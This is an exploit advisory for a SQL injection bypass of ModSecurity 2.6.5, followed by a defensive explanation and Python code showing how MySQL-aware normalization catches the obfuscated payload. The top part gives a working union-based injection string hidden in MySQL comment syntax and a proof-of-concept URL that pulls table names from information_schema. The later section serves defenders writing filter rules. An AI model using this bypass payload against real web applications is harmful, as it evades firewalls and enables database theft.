# Exploit Title: mod_security 2.6.5 SQL injection bypass
# Date: 21/04/2012
# Author: Phizo
# Software Link: http://www.modsecurity.org/
# Version: 2.6.5
# Tested on: Windows 7 & Ubuntu 10.04
----------------------------------------------------------------

/** Although I am using union-based injection, the concept of the bypass is the same **/

[+] Bypass:

+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/#

[+] PoC:

http://victim/page.php?id=12+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/#
mod_security 2.6.5 SQLi bypass
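The bypass above works by hiding the keywords inside MySQL comment syntax: ordinary `/**/` comments are whitespace to MySQL, while the body of a version-conditional comment `/*! ... */` is executed by MySQL even though a filter that treats everything between `/*` and `*/` as a comment never sees it. The following added example (not part of the advisory and not ModSecurity's own code or rule set) shows the defensive side of that: a naive keyword signature misses the quoted payload, while a normalizer that models MySQL's comment handling (dropping `/**/` bodies, keeping `/*! */` bodies, collapsing case and whitespace) exposes the `UNION SELECT` so a rule evaluated after normalization catches it. The two regular expressions and the `normalize_mysql` function are illustrative constructs, not ModSecurity transformations.

```python
import re

# Bypass string quoted in the advisory above ('+' stands for a form-encoded space).
ADVISORY_PAYLOAD = (
    "+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,"
    "/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/"
    "+/*!/**/information_schema/**/*//*!.+tables*/#"
)

# Illustrative naive signature of the kind the advisory defeats: it expects the
# two keywords to be separated by plain whitespace.
NAIVE_UNION_SELECT = re.compile(r"union\s+select", re.IGNORECASE)

# Illustrative signature applied to the normalized form of the input.
NORMALIZED_UNION_SELECT = re.compile(r"\bunion\b.*\bselect\b")


def normalize_mysql(query: str) -> str:
    """Collapse MySQL comment obfuscation so keywords reappear as MySQL parses them.

    Hypothetical normalizer written for this example; it models the two MySQL
    comment forms that the advisory's payload relies on.
    """
    s = query.replace("+", " ")  # form-encoded spaces
    # '/*!' or '/*!50000' opens a version-conditional comment whose body MySQL
    # executes: drop only the opener and keep the body.
    s = re.sub(r"/\*!\d{0,5}", " ", s)
    # Ordinary '/* ... */' comments are whitespace to MySQL: drop them whole.
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.DOTALL)
    # Closers left behind by the conditional comments opened above.
    s = s.replace("*/", " ")
    s = s.lower()
    return re.sub(r"\s+", " ", s).strip()


def naive_rule_matches(query: str) -> bool:
    """True if the whitespace-only signature fires on the raw input."""
    return NAIVE_UNION_SELECT.search(query) is not None


def normalized_rule_matches(query: str) -> bool:
    """True if the keyword signature fires once comment obfuscation is removed."""
    return NORMALIZED_UNION_SELECT.search(normalize_mysql(query)) is not None


if __name__ == "__main__":
    print("naive rule fires:     ", naive_rule_matches(ADVISORY_PAYLOAD))
    print("normalized form:      ", normalize_mysql(ADVISORY_PAYLOAD))
    print("normalized rule fires:", normalized_rule_matches(ADVISORY_PAYLOAD))
```

The practical lesson for a rule author is the ordering of transformations: comment stripping must be MySQL-aware, and signatures have to be matched against the normalized input rather than the raw parameter, otherwise the very transformation meant to defeat obfuscation (discarding the body of `/*! ... */`) removes the evidence before the rule runs.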